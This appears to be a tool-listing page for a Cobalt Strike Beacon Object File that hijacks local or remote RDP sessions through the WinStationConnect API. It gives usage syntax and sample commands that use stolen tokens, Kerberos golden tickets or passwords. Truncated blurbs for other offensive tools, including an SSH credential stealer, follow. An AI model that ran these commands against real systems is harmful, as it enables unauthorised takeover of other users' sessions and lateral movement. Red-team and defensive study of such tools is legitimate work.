Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / kerberos ticket (e.g., golden ticket) of the session owner, you will be able to hijack the session remotely without dropping any beacon/tool on the target server.
To enumerate sessions locally/remotely, you could use Quser-BOF.
Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument] Command Description -------- ----------- password Specifies the password of the user who owns the session to which you want to connect. server Specifies the remote server that you want to perform RDP hijacking. Sample usage -------- Redirect session 2 to session 1 (require SYSTEM privilege): bof-rdphijack 1 2 Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon): bof-rdphijack 1 2 password P@ssw0rd123 Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2): bof-rdphijack 1 2 server SQL01.lab.internal
make
tscon.exe
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…